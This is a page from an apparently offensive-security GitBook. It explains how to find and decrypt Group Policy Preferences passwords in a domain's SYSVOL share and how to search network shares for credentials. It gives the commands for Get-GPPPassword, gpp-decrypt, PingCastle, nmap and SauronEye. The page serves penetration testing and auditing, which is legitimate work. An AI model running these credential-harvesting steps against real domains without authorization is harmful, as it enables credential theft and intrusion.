InfoSec Notes
  • InfoSec Notes
  • General
    • External recon
    • Ports scan
    • Bind / reverse shells
    • File transfer / exfiltration
    • Pivoting
    • Passwords cracking
  • Active Directory
    • Recon - Domain Recon
    • Recon - AD scanners
    • Exploitation - NTLM capture and relay
    • Exploitation - Password spraying
    • Exploitation - Domain Controllers CVE
    • Exploitation - Kerberos AS_REP roasting
    • Exploitation - Credentials theft shuffling
    • Exploitation - GPP and shares searching
    • Exploitation - Kerberos Kerberoasting
    • Exploitation - ACL exploiting
    • Exploitation - GPO users rights
    • Exploitation - Active Directory Certificate Services
    • Exploitation - Kerberos tickets usage
    • Exploitation - Kerberos silver tickets
    • Exploitation - Kerberos delegations
    • Exploitation - gMS accounts (gMSAs)
    • Exploitation - Azure AD Connect
    • Exploitation - Operators to Domain Admins
    • Post Exploitation - ntds.dit dumping
    • Post Exploitation - Kerberos golden tickets
    • Post Exploitation - Trusts hopping
    • Post Exploitation - Persistence
  • L7
    • Methodology
    • 21 - FTP
    • 22 - SSH
    • 25 - SMTP
    • 53 - DNS
    • 111 / 2049 - NFS
    • 113 - Ident
    • 135 - MSRPC
    • 137-139 - NetBIOS
    • 161 - SNMP
    • 389 / 3268 - LDAP
    • 445 - SMB
    • 512 / 513 - REXEC / RLOGIN
    • 554 - RTSP
    • 1099 - JavaRMI
    • 1433 - MSSQL
    • 1521 - ORACLE_DB
    • 3128 - Proxy
    • 3306 - MySQL
    • 3389 - RDP
    • 5985 / 5986 - WSMan
    • 8000 - JDWP
    • 9100 - Printers
    • 11211 - memcached
    • 27017 / 27018 - MongoDB
  • Windows
    • Shellcode and PE loader
    • Bypass PowerShell ConstrainedLanguageMode
    • Bypass AppLocker
    • Local privilege escalation
    • Post exploitation
      • Credentials dumping
      • Defense evasion
      • Local persistence
    • Lateral movements
      • Local credentials re-use
      • Over SMB
      • Over WinRM
      • Over WMI
      • Over DCOM
      • CrackMapExec
  • Linux
    • Local privilege escalation
    • Post exploitation
  • DFIR
    • Common
      • Image acquisition and mounting
      • Memory forensics
      • Web logs analysis
      • Browsers forensics
      • Email forensics
      • Docker forensics
    • Windows
      • Artefacts overview
        • Amcache
        • EVTX
        • Jumplist
        • LNKFile
        • MFT
        • Outlook_files
        • Prefetch
        • RecentFilecache
        • RecycleBin
        • Shellbags
        • Shimcache
        • SRUM
        • Timestamps
        • User Access Logging (UAL)
        • UsnJrnl
        • Miscellaneous
      • TTPs analysis
        • Accounts usage
        • Local persistence
        • Lateral movement
        • PowerShell activity
        • Program execution
        • Timestomping
        • EVTX integrity
        • System uptime
        • ActiveDirectory replication metadata
        • ActiveDirectory persistence
    • Linux
      • Artefacts overview
      • TTPs analysis
        • Timestomping
    • Cloud
      • Azure
      • AWS
    • Tools
      • Velociraptor
      • KAPE
      • Dissect
      • plaso
      • Splunk usage
  • Red Team specifics
    • Phishing - Office Documents
    • OpSec Operating Systems environment
    • EDR bypass with EDRSandBlast
    • Cobalt Strike
  • Web applications
    • Recon - Server exposure
    • Recon - Hostnames discovery
    • Recon - Application mapping
    • Recon - Attack surface overview
    • CMS & softwares
      • ColdFusion
      • DotNetNuke
      • Jenkins
      • Jira
      • Ovidentia
      • WordPress
      • WebDAV
    • Exploitation - Overview
    • Exploitation - Authentication
    • Exploitation - LDAP injections
    • Exploitation - Local and remote file inclusions
    • Exploitation - File upload
    • Exploitation - SQL injections
      • SQLMAP.md
      • MSSQL.md
      • MySQL.md
      • SQLite.md
    • Exploitation - NoSQL injections
      • NoSQLMap.md
      • mongoDB.md
    • Exploitation - GraphQL
  • Binary exploitation
    • Linux - ELF64 ROP leaks
    • (Very) Basic reverse
  • Android
    • Basic static analysis
  • Miscellaneous
    • Regex 101
    • WinDbg Kernel
    • Basic coverage guided fuzzing
Powered by GitBook
On this page
  • Overview
  • Group Policy Preferences (GPP) password searching
  • Distributed shares searching
  1. Active Directory

Exploitation - GPP and shares searching

Overview

The SYSVOL folder, accessible on all Domain Controller to all authenticated users, should be carefully reviewed for sensible information (notably the Group Policy Preferences (GPP) data). Some content may be accessible to unauthenticated users (NULL session or GUEST) and can be a way to gain authenticated access to the Domain.

SMB

The Server Message Block (SMB) protocol, one version of which was also known as Common Internet File System (CIFS), is an application-layer network protocol used for providing shared access to files, printers, and serial ports and miscellaneous communications between nodes on a network. It also provides an authenticated inter-process communication mechanism. Most usage of SMB involves computers running Microsoft Windows.

Group Policy

Group Policy is a feature of the Microsoft Windows NT family of operating systems that controls the working environment of user accounts and computer accounts. Group Policy provides centralized management and configuration of operating systems, applications, and users' settings in an Active Directory environment. A version of Group Policy called Local Group Policy (LGPO or LocalGPO) also allows Group Policy Object (GPO) management on standalone and non-domain joined computers.

Two kinds of Group Policy exist : Group Policy Object (GPO) and Group Policy Preferences (GPP). One of the most useful features of the GPP is the ability to store and use credentials in several scenarios (local user creation, map drives, etc.). When a new GPP is created, an associated XML file is created in the SYSVOL share with the relevant configuration data and if a password is provided, it is AES-256 bit encrypted. Microsoft published the AES private key which can be used to decrypt the password. Since authenticated users (any domain user or users in a trusted domain) have read access to the SYSVOL share, anyone in the domain can search the SYSVOL share for XML files containing a cpassword field, which is the field that contains the AES encrypted password. There are a few more differences between the two, for additional details refer to the following article : http://techgenix.com/policies-vs-preferences/.

SYSVOL

The SYSVOL is the domain-wide share in Active Directory to which all authenticated users have read access. The SYSVOL contains logon scripts, group policy data, and other domain-wide data which needs to be available anywhere there is a Domain Controller (since the SYSVOL is automatically synchronized and shared among all Domain Controllers).

In addition to the GPP data potentially containing password, more sensible information can be stored in the SYSVOL share and its content should be reviewed.

Group Policy Preferences (GPP) password searching

As stated above, GPP may be used in the domain to manage and configure local accounts on domain joined computers. The GPP defined may thus contain passwords and the SYSVOL folder should be reviewed.

PingCastle's healthcheck searches a Domain Controller's SYSVOL share for any XML (*.xml) files that may contain a cpassword field and automatically decrypt any password found.

Additionally, the Get-GPPPassword cmdlet of the PowerSploit suite searches a Domain Controller's SYSVOL share for groups.xml, scheduledtasks.xml, services.xml and datasources.xml files and returns any (decrypted) cpassword passwords:

Get-GPPPassword
Get-GPPPassword -Server <DC>

To manually search for cpassword field / passwords in GPP, the Agent Ransack GUI or the SauronEye CLI tools can be used. Refer to the Distributed searching tools section below for more information.

The Ruby gpp-password script can be used to decrypt a GPP password:

gpp-decrypt <ENC_PASSWORD>

Distributed shares searching

Enumerate accessible shares

The PingCastle's share module can be used to enumerate the machines joined in the current, or specified, Active Directory domain and then retrieve the exposed shares by each machines through direct SMB queries.

PingCastle.exe --scanner share
PingCastle.exe --server <DC_FQDN | DC_IP> --user "<DOMAIN>\<USERNAME>" --password "<PASSWORD>" --scanner share

From an unauthenticated perspective, nmap can be used to conduct a network scan to enumerate exposed SMB services and to list the accessible shares on the accessible services:

nmap --script smb-enum-shares.nse -p 445 <TARGETS>
nbtscan -r <RANGE>

For more practical information about shares listing and searching, refer to the [L7 SMB] - Methodology note.

Distributed searching tools

The Agent Ransack GUI or SauronEye CLI files searching tool can be used to search files in SMB shares for specified keywords or regex, such as pass*, etc.

SauronEye.exe --directories <LOCAL_DIRECTORY | NETWORK_SHARE> <...> --filetypes <.FILE_EXTENSION> <...> --contents --keywords <KEYWORD | BASIC_REGEX>
PreviousExploitation - Credentials theft shufflingNextExploitation - Kerberos Kerberoasting

Last updated 3 years ago